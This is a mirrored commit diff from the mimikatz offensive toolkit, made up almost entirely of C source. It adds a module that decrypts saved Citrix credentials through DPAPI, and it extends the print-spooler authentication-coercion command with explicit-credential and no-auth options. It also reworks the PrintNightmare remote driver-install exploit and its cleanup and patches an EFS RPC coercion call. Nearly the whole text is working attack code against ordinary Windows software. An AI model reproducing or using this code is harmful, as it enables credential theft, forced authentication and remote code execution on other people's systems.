mirror of
https://github.com/gentilkiwi/mimikatz
synced 2025-03-18 08:31:40 +00:00
Merge branch 'gentilkiwi:master' into master
This commit is contained in:
commit
a952a601b5
inc
mimikatz
mimikatz.vcxprojmimikatz.vcxproj.filters
modules
mimispool
modules
@ -118,7 +118,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
|
||||
#define KULL_M_WIN_BUILD_10_1909 18363
|
||||
#define KULL_M_WIN_BUILD_10_2004 19041
|
||||
#define KULL_M_WIN_BUILD_10_20H2 19042
|
||||
|
||||
#define KULL_M_WIN_BUILD_2022 20348
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
|
||||
#define KULL_M_WIN_MIN_BUILD_7 7000
|
||||
#define KULL_M_WIN_MIN_BUILD_8 8000
|
||||
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
|
||||
#define KULL_M_WIN_MIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_MIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_MIN_BUILD_11 22000
|
@ -173,6 +173,7 @@
|
||||
<ClCompile Include="modules\dpapi\kuhl_m_dpapi.c" />
|
||||
<ClCompile Include="modules\dpapi\kuhl_m_dpapi_oe.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_creds.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_keys.c" />
|
||||
@ -289,6 +290,7 @@
|
||||
<ClInclude Include="modules\dpapi\kuhl_m_dpapi.h" />
|
||||
<ClInclude Include="modules\dpapi\kuhl_m_dpapi_oe.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_creds.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_keys.h" />
|
||||
|
@ -329,6 +329,9 @@
|
||||
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-efsr_c.c">
|
||||
<Filter>common modules\rpc</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c">
|
||||
<Filter>local modules\dpapi\packages</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="mimikatz.h" />
|
||||
@ -677,6 +680,9 @@
|
||||
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-efsr.h">
|
||||
<Filter>common modules\rpc</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h">
|
||||
<Filter>local modules\dpapi\packages</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="local modules">
|
||||
|
@ -27,6 +27,7 @@ const KUHL_M_C kuhl_m_c_dpapi[] = {
|
||||
{kuhl_m_dpapi_cloudap_keyvalue_derived, L"cloudapkd", L""},
|
||||
{kuhl_m_dpapi_cloudap_fromreg, L"cloudapreg", L""},
|
||||
{kuhl_m_dpapi_sccm_networkaccessaccount, L"sccm", L""},
|
||||
{kuhl_m_dpapi_citrix, L"citrix", L""},
|
||||
{kuhl_m_dpapi_oe_cache, L"cache", NULL},
|
||||
};
|
||||
const KUHL_M kuhl_m_dpapi = {
|
||||
|
@ -20,6 +20,7 @@
|
||||
#include "packages/kuhl_m_dpapi_lunahsm.h"
|
||||
#include "packages/kuhl_m_dpapi_cloudap.h"
|
||||
#include "packages/kuhl_m_dpapi_sccm.h"
|
||||
#include "packages/kuhl_m_dpapi_citrix.h"
|
||||
|
||||
const KUHL_M kuhl_m_dpapi;
|
||||
|
||||
|
89
mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
Normal file
89
mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
Normal file
@ -0,0 +1,89 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
https://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : https://creativecommons.org/licenses/by/4.0/
|
||||
*/
|
||||
#include "kuhl_m_dpapi_citrix.h"
|
||||
|
||||
const char CITRIX_SAVED_CREDENTIALS_GUID[] = "{921BB3E1-15EE-4bbe-83D4-C4CE176A481B}";
|
||||
NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[])
|
||||
{
|
||||
PKULL_M_REGISTRY_HANDLE hRegistry;
|
||||
PBYTE pbData;
|
||||
DWORD cbData;
|
||||
LPCWSTR szData;
|
||||
LPWSTR szGuid = NULL, szUrl, szBase64, szSavedCreds;
|
||||
LPSTR sEntropy;
|
||||
IXMLDOMDocument *pXMLDom;
|
||||
IXMLDOMNode *pNode;
|
||||
LPVOID pDataOut;
|
||||
DWORD dwDataOutLen;
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"guid", &szData, NULL))
|
||||
{
|
||||
kull_m_string_copy(&szGuid, szData);
|
||||
}
|
||||
else if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hRegistry)) // todo: offline
|
||||
{
|
||||
//For v3, KEY_WOW64_32KEY
|
||||
kull_m_registry_OpenAndQueryWithAlloc(hRegistry, HKEY_LOCAL_MACHINE, L"SOFTWARE\\"
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
|
||||
L"WOW6432Node\\"
|
||||
#endif
|
||||
L"Citrix\\AuthManager", L"Guid", NULL, (LPVOID *) &szGuid, NULL);
|
||||
kull_m_registry_close(hRegistry);
|
||||
}
|
||||
|
||||
if(szGuid)
|
||||
{
|
||||
kprintf(L"Citrix instance GUID : %s\n", szGuid);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"in", &szData, NULL))
|
||||
{
|
||||
kprintf(L"Using saved data from: %s\n", szData);
|
||||
if(pXMLDom = kull_m_xml_CreateAndInitDOM())
|
||||
{
|
||||
if(kull_m_xml_LoadXMLFile(pXMLDom, szData))
|
||||
{
|
||||
if((IXMLDOMDocument_selectSingleNode(pXMLDom, (BSTR) L"//Data/Item", &pNode) == S_OK) && pNode)
|
||||
{
|
||||
szUrl = kull_m_xml_getAttribute(pNode, L"url");
|
||||
if(szUrl)
|
||||
{
|
||||
kprintf(L"URL: %s\n", szUrl);
|
||||
kull_m_string_sprintfA(&sEntropy, "%S%s%S", szUrl, CITRIX_SAVED_CREDENTIALS_GUID, szGuid);
|
||||
if(sEntropy)
|
||||
{
|
||||
if(IXMLDOMNode_get_text(pNode, &szBase64) == S_OK)
|
||||
{
|
||||
if(kull_m_string_quick_base64_to_Binary(szBase64, &pbData, &cbData))
|
||||
{
|
||||
if(kuhl_m_dpapi_unprotect_raw_or_blob(pbData, cbData, NULL, argc, argv, sEntropy, lstrlenA(sEntropy), &pDataOut, &dwDataOutLen, NULL))
|
||||
{
|
||||
if(kull_m_string_copy_len(&szSavedCreds, (LPCWSTR) pDataOut, dwDataOutLen / sizeof(wchar_t)))
|
||||
{
|
||||
UrlUnescapeInPlace(szSavedCreds, 0);
|
||||
kprintf(L" > Saved data: %s\n", szSavedCreds);
|
||||
LocalFree(szSavedCreds);
|
||||
}
|
||||
LocalFree(pDataOut);
|
||||
}
|
||||
}
|
||||
SysFreeString(szBase64);
|
||||
}
|
||||
LocalFree(sEntropy);
|
||||
}
|
||||
LocalFree(szUrl);
|
||||
}
|
||||
}
|
||||
}
|
||||
kull_m_xml_ReleaseDom(pXMLDom);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"Input Citrix saved data needed (/in:%%localappdata%%\\Citrix\\AuthManager\\Data\\<file.dat>)\n");
|
||||
LocalFree(szGuid);
|
||||
}
|
||||
else PRINT_ERROR(L"No instance GUID ? (use /guid:xxx (without {} to specify\n");
|
||||
|
||||
return STATUS_SUCCESS;
|
||||
}
|
9
mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
Normal file
9
mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
Normal file
@ -0,0 +1,9 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
https://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : https://creativecommons.org/licenses/by/4.0/
|
||||
*/
|
||||
#pragma once
|
||||
#include "../kuhl_m_dpapi.h"
|
||||
|
||||
NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[]);
|
@ -1342,58 +1342,127 @@ handle_t __RPC_USER STRING_HANDLE_bind(IN STRING_HANDLE Name) {return hSpoolHand
|
||||
void __RPC_USER STRING_HANDLE_unbind(IN STRING_HANDLE Name, handle_t hSpool) {}
|
||||
NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[])
|
||||
{
|
||||
LPCWSTR szRemote, szCallbackTo;
|
||||
LPWSTR szPathToCallback = NULL;
|
||||
NTSTATUS status;
|
||||
PRINTER_HANDLE hPrinter;
|
||||
DEVMODE_CONTAINER Container = {0, NULL};
|
||||
DWORD ret;
|
||||
DWORD dwRet, AuthnSvc;
|
||||
long ret = 0;
|
||||
NETRESOURCE nr = {0, RESOURCETYPE_DISK, 0, 0, NULL, NULL, NULL, NULL};
|
||||
LPCWSTR szUser, szPassword, szRemote = NULL, szEndpoint, szCallbackTo;
|
||||
PWSTR szPathToCallback;
|
||||
|
||||
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"authuser", &szUser, NULL))
|
||||
{
|
||||
AuthnSvc = RPC_C_AUTHN_GSS_NEGOTIATE;
|
||||
kprintf(L"[auth ] Explicit authentication\n");
|
||||
kprintf(L"[auth ] Username: %s\n", szUser);
|
||||
secIdentity.User = (USHORT *) szUser;
|
||||
secIdentity.UserLength = lstrlen(szUser);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"authpassword", &szPassword, NULL))
|
||||
{
|
||||
kprintf(L"[auth ] Password: %s\n", szPassword);
|
||||
secIdentity.Password = (USHORT *) szPassword;
|
||||
secIdentity.PasswordLength = lstrlen(szPassword);
|
||||
}
|
||||
}
|
||||
else if(kull_m_string_args_byName(argc, argv, L"noauth", NULL, NULL))
|
||||
{
|
||||
AuthnSvc = RPC_C_AUTHN_NONE;
|
||||
kprintf(L"[auth ] None\n");
|
||||
szUser = szPassword = L"";
|
||||
}
|
||||
else
|
||||
{
|
||||
AuthnSvc = RPC_C_AUTHN_DEFAULT;
|
||||
kprintf(L"[auth ] Default (current)\n");
|
||||
szUser = szPassword = NULL;
|
||||
}
|
||||
|
||||
kull_m_string_args_byName(argc, argv, L"endpoint", &szEndpoint, L"\\pipe\\spoolss");
|
||||
kprintf(L"[ rpc ] Endpoint: %s\n", szEndpoint);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"server", &szRemote, NULL) || kull_m_string_args_byName(argc, argv, L"target", &szRemote, NULL))
|
||||
{
|
||||
if(kull_m_string_args_byName(argc, argv, L"connect", &szCallbackTo, NULL) || kull_m_string_args_byName(argc, argv, L"callback", &szCallbackTo, NULL))
|
||||
{
|
||||
if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
|
||||
if(kull_m_string_sprintf(&nr.lpRemoteName, L"\\\\%s\\IPC$", szRemote))
|
||||
{
|
||||
kprintf(L"[info] %s will try to connect to %s\\IPC$\n\n", szRemote, szPathToCallback);
|
||||
if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, L"\\pipe\\spoolss", L"spooler", TRUE, RPC_C_AUTHN_DEFAULT, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
|
||||
if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
|
||||
{
|
||||
RpcTryExcept
|
||||
kprintf(L"[trans] Disconnect eventual IPC: ");
|
||||
dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
|
||||
if((dwRet == NO_ERROR) || (dwRet == ERROR_NOT_CONNECTED))
|
||||
{
|
||||
ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
|
||||
if(ret == ERROR_SUCCESS)
|
||||
kprintf(L"OK\n[trans] Connect to IPC: ");
|
||||
dwRet = WNetAddConnection2(&nr, szPassword, szUser, CONNECT_TEMPORARY);
|
||||
if(dwRet == NO_ERROR)
|
||||
{
|
||||
ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
|
||||
if(ret == ERROR_SUCCESS)
|
||||
kprintf(L"OK\n");
|
||||
if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, szEndpoint, L"spooler", TRUE, AuthnSvc, secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
|
||||
{
|
||||
kprintf(L"Connected to the target, and notification is OK (?!)\n");
|
||||
ret = RpcFindClosePrinterChangeNotification(hPrinter);
|
||||
if(ret != ERROR_SUCCESS)
|
||||
kprintf(L"[ rpc ] Resolve Endpoint: ");
|
||||
status = RpcEpResolveBinding(hSpoolHandle, &winspool_v1_0_c_ifspec);
|
||||
if(status == RPC_S_OK)
|
||||
{
|
||||
PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
|
||||
kprintf(L"OK\n\n");
|
||||
RpcTryExcept
|
||||
{
|
||||
ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
|
||||
if(ret == ERROR_SUCCESS)
|
||||
{
|
||||
ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
|
||||
if(ret == ERROR_SUCCESS)
|
||||
{
|
||||
kprintf(L"Connected to the target, and notification is OK (?!)\n");
|
||||
ret = RpcFindClosePrinterChangeNotification(hPrinter);
|
||||
if(ret != ERROR_SUCCESS)
|
||||
{
|
||||
PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
|
||||
}
|
||||
}
|
||||
else if(ret == ERROR_ACCESS_DENIED)
|
||||
{
|
||||
kprintf(L"Access is denied (can be OK)\n");
|
||||
}
|
||||
else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
|
||||
|
||||
ret = RpcClosePrinter(&hPrinter);
|
||||
if(ret != ERROR_SUCCESS)
|
||||
{
|
||||
PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
kprintf(L"\n");
|
||||
}
|
||||
else PRINT_ERROR(L"RpcEpResolveBinding: 0x%08x\n", status);
|
||||
|
||||
kull_m_rpc_deleteBinding(&hSpoolHandle);
|
||||
}
|
||||
else if(ret == ERROR_ACCESS_DENIED)
|
||||
{
|
||||
kprintf(L"Access is denied (can be OK)\n");
|
||||
}
|
||||
else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
|
||||
|
||||
ret = RpcClosePrinter(&hPrinter);
|
||||
if(ret != ERROR_SUCCESS)
|
||||
kprintf(L"[trans] Disconnect IPC: ");
|
||||
dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
|
||||
if(dwRet == NO_ERROR)
|
||||
{
|
||||
PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
|
||||
kprintf(L"OK\n");
|
||||
}
|
||||
else PRINT_ERROR(L"WNetCancelConnection2: 0x%08x\n");
|
||||
}
|
||||
else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
|
||||
else PRINT_ERROR(L"WNetAddConnection2:%u\n", dwRet);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
else PRINT_ERROR(L"WNetCancelConnection2: %u\n", dwRet);
|
||||
|
||||
kull_m_rpc_deleteBinding(&hSpoolHandle);
|
||||
LocalFree(szPathToCallback);
|
||||
}
|
||||
|
||||
LocalFree(szPathToCallback);
|
||||
LocalFree(nr.lpRemoteName);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"missing /connect argument to specify notifications target");
|
||||
@ -1482,11 +1551,11 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[])
|
||||
else if(ret == 0)
|
||||
{
|
||||
PRINT_ERROR(L"EfsRpcOpenFileRaw is a success, really? (not normal)\n");
|
||||
EfsRpcCloseRaw(&hEfsHandle);
|
||||
EfsRpcCloseRaw(&hImportCtx);
|
||||
}
|
||||
else
|
||||
{
|
||||
PRINT_ERROR(L"EfsRpcOpenFileRaw: ", ret);
|
||||
PRINT_ERROR(L"EfsRpcOpenFileRaw: %u\n", ret);
|
||||
}
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
@ -1589,7 +1658,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
DriverInfo.pEnvironment = bIsX64 ? L"Windows x64" : L"Windows NT x86";
|
||||
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
|
||||
{
|
||||
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pConfigFile, NULL))
|
||||
if(kuhl_m_misc_printnightmare_normalize_library(bIsPar, szLibrary, &DriverInfo.pConfigFile, NULL))
|
||||
{
|
||||
szForce = kull_m_string_args_byName(argc, argv, L"useown", NULL, NULL) ? DriverInfo.pConfigFile : NULL;
|
||||
|
||||
@ -1600,7 +1669,13 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
{
|
||||
if(kuhl_m_misc_printnightmare_FillStructure(&DriverInfo, bIsX64, !kull_m_string_args_byName(argc, argv, L"nodynamic", NULL, NULL), szForce, bIsPar, hSpoolHandle))
|
||||
{
|
||||
kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER);
|
||||
if(kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER))
|
||||
{
|
||||
if(!bIsPar) // we can't remotely with normal user, use /clean with > rights
|
||||
{
|
||||
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hSpoolHandle, DriverInfo.pEnvironment, DriverInfo.pName);
|
||||
}
|
||||
}
|
||||
|
||||
LocalFree(DriverInfo.pDataFile);
|
||||
LocalFree(DriverInfo.pDriverPath);
|
||||
@ -1624,7 +1699,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
LPCWSTR szPtr;
|
||||
@ -1641,7 +1716,14 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz
|
||||
}
|
||||
else
|
||||
{
|
||||
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
|
||||
if(!bIsPar)
|
||||
{
|
||||
status = kull_m_file_getAbsolutePathOf(szLibrary, pszNormalizedLibrary);
|
||||
}
|
||||
else
|
||||
{
|
||||
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
|
||||
}
|
||||
}
|
||||
|
||||
if(status)
|
||||
@ -1742,7 +1824,7 @@ BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64
|
||||
|
||||
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
|
||||
{
|
||||
DWORD i, ret, cReturned = 0;
|
||||
DWORD i, cReturned = 0;
|
||||
_PDRIVER_INFO_2 pDriverInfo;
|
||||
PWSTR pName, pConfig;
|
||||
|
||||
@ -1759,28 +1841,7 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
|
||||
{
|
||||
if(pName == wcsstr(pName, MIMIKATZ L"-"))
|
||||
{
|
||||
RpcTryExcept
|
||||
{
|
||||
if(bIsPar)
|
||||
{
|
||||
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
|
||||
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"> RpcDeletePrinterDriverEx: ");
|
||||
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hRemoteBinding, szEnvironment, pName);
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -1789,8 +1850,9 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
|
||||
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD ret;
|
||||
DRIVER_CONTAINER container_info;
|
||||
|
||||
@ -1813,6 +1875,7 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
status = TRUE;
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
@ -1820,6 +1883,40 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD ret;
|
||||
|
||||
RpcTryExcept
|
||||
{
|
||||
if(bIsPar)
|
||||
{
|
||||
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
|
||||
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, (wchar_t *) pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"> RpcDeletePrinterDriverEx: ");
|
||||
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, (wchar_t *)pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
status = TRUE;
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned)
|
||||
|
@ -51,10 +51,11 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
|
||||
BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
|
||||
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
|
||||
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
|
||||
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
|
||||
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName);
|
||||
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);
|
||||
|
||||
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
|
||||
|
@ -645,7 +645,7 @@ NTSTATUS kuhl_m_net_trust(int argc, wchar_t * argv[])
|
||||
else PRINT_ERROR(L"DsEnumerateDomainTrusts: %u\n", ret);
|
||||
|
||||
kprintf(L"\n\nLDAP mode: ");
|
||||
if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn))
|
||||
if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn, NULL))
|
||||
{
|
||||
if(kull_m_string_sprintf(&sysDN, L"CN=System,%s", dn))
|
||||
{
|
||||
@ -761,7 +761,7 @@ L")";
|
||||
BOOL isCheckDNS = kull_m_string_args_byName(argc, argv, L"dns", NULL, NULL);
|
||||
kull_m_string_args_byName(argc, argv, L"server", &server, NULL);
|
||||
|
||||
if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn))
|
||||
if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn, NULL))
|
||||
{
|
||||
dwRet = ldap_search_s(ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, &pMessage);
|
||||
if(dwRet == LDAP_SUCCESS)
|
||||
|
@ -317,7 +317,7 @@ BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR
|
||||
PWCHAR myAttrs[] = {L"name", L"sAMAccountName", L"objectSid", L"sIDHistory", L"objectGUID", NULL}, dn, filter;
|
||||
if(filter = kuhl_m_sid_filterFromArgs(argc, argv))
|
||||
{
|
||||
if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn))
|
||||
if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn, NULL))
|
||||
{
|
||||
*pMessage = NULL;
|
||||
